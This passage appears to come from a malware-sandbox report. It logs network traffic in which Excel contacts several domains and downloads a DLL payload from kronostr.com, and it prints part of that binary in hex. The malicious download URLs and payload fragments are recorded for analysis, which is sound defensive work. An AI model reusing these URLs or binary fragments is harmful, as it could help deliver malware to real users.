                                                                                                                    Aug 6, 2022 09:20:18.498624086 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498641014 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498665094 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498682022 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498703957 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498709917 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498727083 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498749018 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498749018 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498773098 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498789072 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498794079 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498819113 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498816967 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498842001 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498846054 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498864889 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498877048 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498889923 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498913050 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498923063 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498939037 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498960972 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498970985 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.498981953 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.498994112 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499005079 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499027967 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499047995 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499051094 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499075890 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499080896 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499098063 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499108076 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499123096 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499145985 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499152899 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499169111 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499171972 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499191999 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499201059 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499213934 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499231100 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499232054 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499253988 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499272108 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499275923 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499300003 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499306917 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499321938 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499334097 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499356985 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499373913 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499392986 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499412060 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499414921 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.499458075 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.499535084 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.501912117 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.502548933 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:20.000885963 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.106672049 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.107103109 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.107244015 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.212127924 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.218357086 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.218457937 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.218481064 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.218513012 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.218571901 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.218573093 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.218581915 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.218626976 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:20.218678951 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:20.218688011 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:50.245140076 CEST804917366.96.149.19192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:50.245261908 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:20:50.811296940 CEST49174443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:50.811369896 CEST44349174165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:50.811436892 CEST49174443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:50.876319885 CEST49174443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:50.876357079 CEST44349174165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.173978090 CEST44349174165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.197104931 CEST49175443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:51.197158098 CEST44349175165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.197247982 CEST49175443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:51.200486898 CEST49175443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:51.200520992 CEST44349175165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.502160072 CEST44349175165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.503695965 CEST49176443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:51.503757000 CEST44349176165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.503878117 CEST49176443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:51.504280090 CEST49176443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:51.504323959 CEST44349176165.22.254.68192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:51.504415989 CEST49176443192.168.2.22165.22.254.68
                                                                                                                    Aug 6, 2022 09:20:53.106547117 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:53.209809065 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:53.209896088 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:53.211028099 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:53.313848972 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:53.324929953 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:53.324959040 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:53.325005054 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:53.325028896 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:53.338709116 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:53.441682100 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:53.444519043 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:53.444685936 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:56.477252960 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:20:56.580197096 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:57.512943029 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:57.514293909 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:21:00.516241074 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:21:00.516290903 CEST808049177198.199.70.22192.168.2.22
                                                                                                                    Aug 6, 2022 09:21:00.516429901 CEST491778080192.168.2.22198.199.70.22
                                                                                                                    Aug 6, 2022 09:21:23.501450062 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:21:23.501607895 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:22:13.076642036 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:22:13.076697111 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:22:13.124903917 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:22:13.575527906 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:22:14.184096098 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:22:15.400974989 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:22:17.803498983 CEST4917380192.168.2.2266.96.149.19
                                                                                                                    Aug 6, 2022 09:22:22.608761072 CEST4917380192.168.2.2266.96.149.19

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Aug 6, 2022 09:20:16.169598103 CEST5586853192.168.2.228.8.8.8
                                                                                                                    Aug 6, 2022 09:20:16.339459896 CEST53558688.8.8.8192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.766623020 CEST4968853192.168.2.228.8.8.8
                                                                                                                    Aug 6, 2022 09:20:17.905766964 CEST53496888.8.8.8192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:19.865408897 CEST5883653192.168.2.228.8.8.8
                                                                                                                    Aug 6, 2022 09:20:19.999242067 CEST53588368.8.8.8192.168.2.22

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Aug 6, 2022 09:20:16.169598103 CEST192.168.2.228.8.8.80x9717Standard query (0)www.zardamarine.comA (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:17.766623020 CEST192.168.2.228.8.8.80x2136Standard query (0)kronostr.comA (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:19.865408897 CEST192.168.2.228.8.8.80x410cStandard query (0)labfitouts.comA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Aug 6, 2022 09:20:16.339459896 CEST8.8.8.8192.168.2.220x9717No error (0)www.zardamarine.comzardamarine.comCNAME (Canonical name)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:16.339459896 CEST8.8.8.8192.168.2.220x9717No error (0)zardamarine.com208.67.23.91A (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:17.905766964 CEST8.8.8.8192.168.2.220x2136No error (0)kronostr.com188.132.217.108A (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:19.999242067 CEST8.8.8.8192.168.2.220x410cNo error (0)labfitouts.com66.96.149.19A (IP address)IN (0x0001)

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.zardamarine.com
                                                                                                                    • kronostr.com
                                                                                                                    • labfitouts.com

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.2249171208.67.23.91443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    1192.168.2.2249172188.132.217.10880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Aug 6, 2022 09:20:17.956005096 CEST7OUTGET /tr/68yHRhfuU7Qj/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: kronostr.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Aug 6, 2022 09:20:18.101455927 CEST9INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 06 Aug 2022 07:20:16 GMT
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Length: 661504
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Powered-By: PHP/7.1.33
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Sat, 06 Aug 2022 07:20:16 GMT
                                                                                                                    Content-Disposition: attachment; filename="UVvnppK.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Set-Cookie: 62ee1630cc8c8=1659770416; expires=Sat, 06-Aug-2022 07:21:16 GMT; Max-Age=60; path=/
                                                                                                                    Last-Modified: Sat, 06 Aug 2022 07:20:16 GMT
                                                                                                                    X-Powered-By: PleskLin
                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 6a 38 a2 62 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 15 00 24 00 00 00 f0 09 00 00 0a 00 00 f0 13 00 00 00 10 00 00 00 00 a0 61 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 0a 00 00 04 00 00 d6 b9 0a 00 03 00 00 00 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 00 00 45 01 00 00 00 a0 00 00 28 07 00 00 00 d0 00 00 cc c4 09 00 00 60 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 a1 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 23 00 00 00 10 00 00 00 24 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 50 60 2e 64 61 74 61 00 00 00 e0 0d 00 00 00 40 00 00 00 0e 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 b0 02 00 00 00 50 00 00 00 04 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 70 64 61 74 61 00 00 30 03 00 00 00 60 00 00 00 04 00 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 78 64 61 74 61 00 00 98 02 00 00 00 70 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 a0 09 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 45 01 00 00 00 90 00 00 00 02 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 28 07 00 00 00 a0 00 00 00 08 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 58 00 00 00 00 b0 00 00 00 02 00 00 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 74 6c 73 00 00 00 00 48 00 00 00 00 c0 00 00 00 02 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72
                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdj8b."$a E(`0(.text0#$ P`.data@(@`.rdataP6@`@.pdata0`:@0@.xdatap>@0@.bss`.edataEB@0@.idata(D@0.CRTXL@@.tlsHN@`.r
                                                                                                                    Aug 6, 2022 09:20:18.101490021 CEST10INData Raw: 73 72 63 00 00 00 cc c4 09 00 00 d0 00 00 00 c6 09 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 80 00 00 00 00 a0 0a 00 00 02 00 00 00 16 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 00 00 00 00
                                                                                                                    Data Ascii: srcP@0.reloc@0BSH
                                                                                                                    Aug 6, 2022 09:20:18.101511002 CEST11INData Raw: 20 48 89 cb e8 e3 ff ff ff 48 89 d9 48 83 c4 20 5b e9 86 1e 00 00 66 0f 1f 44 00 00 48 8d 05 39 38 00 00 48 89 01 c3 0f 1f 44 00 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 38 4c 8b a4 24 a0 00 00 00 49 63 c1 4c 89 c2 4c 89 c3 48 c1 e0 06 45
                                                                                                                    Data Ascii: HHH [fDH98HDAWAVAUATUWVSH8L$IcLLHEH)HcB<ALh xPDx$1LT$,tD1H9vHLLAH&uE)D$,JkB:HHH8[^_]A\A]A^A_1fff.AWAVAUA
                                                                                                                    Aug 6, 2022 09:20:18.101535082 CEST13INData Raw: 00 00 e8 7b 0e 00 00 b8 01 00 00 00 48 83 c4 28 c3 90 56 53 48 83 ec 28 83 3d 73 32 00 00 02 74 0a c7 05 67 32 00 00 02 00 00 00 83 fa 02 74 12 83 fa 01 74 3f b8 01 00 00 00 48 83 c4 28 5b 5e c3 90 48 8d 1d 79 96 00 00 48 8d 35 72 96 00 00 48 39
                                                                                                                    Data Ascii: {H(VSH(=s2tg2tt?H([^HyH5rH9tHHtHH9uH([^1Hfff.HVSH8HD$XHHT$XLD$`LL$hHD$(H6LH`A
                                                                                                                    Aug 6, 2022 09:20:18.101566076 CEST14INData Raw: ff 44 0f b6 01 41 f6 c0 80 74 a2 49 81 c8 00 ff ff ff 49 29 d0 4d 01 c8 4c 89 45 d0 eb a5 83 f8 20 74 ca 83 f8 40 0f 85 44 ff ff ff e9 30 ff ff ff 48 03 1d 88 61 00 00 48 8d 0d 29 32 00 00 48 8b 43 10 4c 8b 43 08 8b 50 08 e8 29 fb ff ff 48 8d 0d
                                                                                                                    Data Ascii: DAtII)MLE t@D0HaH)2HCLCP)HJ2H(H,HHtH,HPH@H,HuH(ff.VSH(Ht,tH5uHH([^@1H5W
                                                                                                                    Aug 6, 2022 09:20:18.101597071 CEST16INData Raw: 89 55 00 03 50 08 48 8d 04 fe 48 83 c7 01 44 29 e8 89 45 08 89 55 04 48 83 c5 0c 48 83 ff 20 74 1d 48 89 f9 e8 15 06 00 00 48 85 c0 75 c0 48 85 ff 75 2a b8 01 00 00 00 e9 40 ff ff ff 90 ba 20 00 00 00 49 89 d8 48 8d 0d 11 62 00 00 ff 15 f3 7d 00
                                                                                                                    Data Ascii: UPHHD)EUHH tHHuHu*@ IHb} ffff.VSH8HH CCG =vG=1=t=t/HyaH0HH8[^H@=rY1
                                                                                                                    Aug 6, 2022 09:20:18.101619959 CEST16INData Raw: e8 4f 04 00 00 48 83 f8 08 77 67 48 8d 0d b2 d6 ff ff e8 5d ff ff ff 85 c0 74 57 48 63 15 de d6 ff ff 48 8d 05 9b d6 ff ff 48 01 d0 0f b7 50 06 0f b7 48 14 85 d2 74 3a 0f b7 c9 83 ea 01 48 8d 5c 08 18 48 8d 04 92 48 8d 7c c3 28 eb 0f 66 0f 1f 44
                                                                                                                    Data Ascii: OHwgH]tWHcHHPHt:H\HH|(fDH(H9t'AHHuHH [^_1HH [^_SH HH!tHHH)H [
                                                                                                                    Aug 6, 2022 09:20:18.101646900 CEST17INData Raw: fe ff ff 90 31 c0 48 83 c4 20 5b c3 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8d 0d e5 d5 ff ff e8 90 fe ff ff 31 d2 85 c0 74 13 48 63 05 0f d6 ff ff 48 8d 15 cc d5 ff ff 0f b7 54 02 06 89 d0 48 83 c4 28 c3 53 48 83 ec 20 48 89 cb 48 8d 0d b1 d5 ff
                                                                                                                    Data Ascii: 1H [H(H1tHcHTH(SH HH\1tPHcHHHD@t2EJTHHD(B' tHtHH(H9u1HH [ffff.H(H51H%HEHH(f
                                                                                                                    Aug 6, 2022 09:20:18.101676941 CEST19INData Raw: 5f 5d 48 ff e0 0f 1f 44 00 00 b8 01 00 00 00 48 83 c4 28 5b 5e 5f 5d c3 90 90 56 53 48 83 ec 28 4c 89 c3 4c 89 ce e8 0f 03 00 00 31 d2 84 c0 74 17 48 89 1e 48 c7 46 10 10 00 00 00 ba 01 00 00 00 c7 46 08 06 00 00 00 89 d0 48 83 c4 28 5b 5e c3 90
                                                                                                                    Data Ascii: _]HDH([^_]VSH(LL1tHHFFH([^SH@HLHD$ D$(D$,HD$0LL$ MP0T$(1uHD$ HH@[UWVSH8H$H;$HDH$t(LHMtH
                                                                                                                    Aug 6, 2022 09:20:18.101706028 CEST20INData Raw: 0c bd 00 24 59 eb 70 ca fa 82 06 bc 28 ba 75 dd 27 bc 24 b6 06 1a 11 dd 33 7e 14 bb 34 49 0f 4c aa 6e 12 6f 8c 6c 40 11 77 4d 74 e3 61 31 04 72 5a 57 f7 0c 67 63 2b 42 6c 9d 2f 2c 62 00 1d 52 a4 13 59 53 42 58 6d 81 b4 7d 63 5e 42 6c 2f 31 3c 92
                                                                                                                    Data Ascii: $Yp(u'$3~4ILnol@wMta1rZWgc+Bl/,bRYSBXm}c^Bl/1<v72pnbz.*M'So8MFS6Q;4Hb<]>tGj0^.u2-\(B5PKOz[#EaBsv%#52#Z?<$0\q2X:5:<ukfW5"_&F']W$B2]n<qo1S
                                                                                                                    Aug 6, 2022 09:20:18.149869919 CEST22INData Raw: 3a 6e e8 00 79 04 15 60 1e 4b ba 9f 23 5d 94 b5 47 65 d1 50 6e b1 d8 7a 13 16 19 6f a8 fd 7e 42 b0 61 c5 de ff 23 74 24 2b 96 26 66 50 13 0b 36 75 23 15 3c e1 1d 42 78 4f c0 3c d9 ac 13 7c 07 34 2b 2c cd 61 51 23 d5 0a c3 02 df 98 11 74 94 7e 31
                                                                                                                    Data Ascii: :ny`K#]GePnzo~Ba#t$+&fP6u#<BxO<|4+,aQ#t~1%&.O0XQ+fg75yxoK(x5y4fJ4mFulB?C[wZ6v*#*zBlu[x$$! X0I2)plZ'4"Y>M n8I!VR%&o+"@j* (m:[3ZQ90q3A}y


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    2192.168.2.224917366.96.149.1980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Aug 6, 2022 09:20:20.107244015 CEST707OUTGET /cgi-bin/Rea3Iu3wGvgAbTset0/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: labfitouts.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Aug 6, 2022 09:20:20.218357086 CEST708INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 06 Aug 2022 07:20:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 6424
                                                                                                                    Connection: keep-alive
                                                                                                                    Server: Apache/2
                                                                                                                    Last-Modified: Mon, 26 Aug 2019 18:26:26 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Age: 0
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 0a 20 20 20 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 20 3c 74 69 74 6c 65 3e 69 50 61 67 65 3c 2f 74 69 74 6c 65 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 31 2e 69 70 61 67 65 2e 63 6f 6d 2f 78 73 6c 74 2f 65 6c 65 6d 65 6e 74 73 2f 67 65 6e 65 72 69 63 5f 63 73 73 63 6f 6d 70 6f 6e 65 6e 74 2e 63 73 73 22 20 2f 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 31 2e 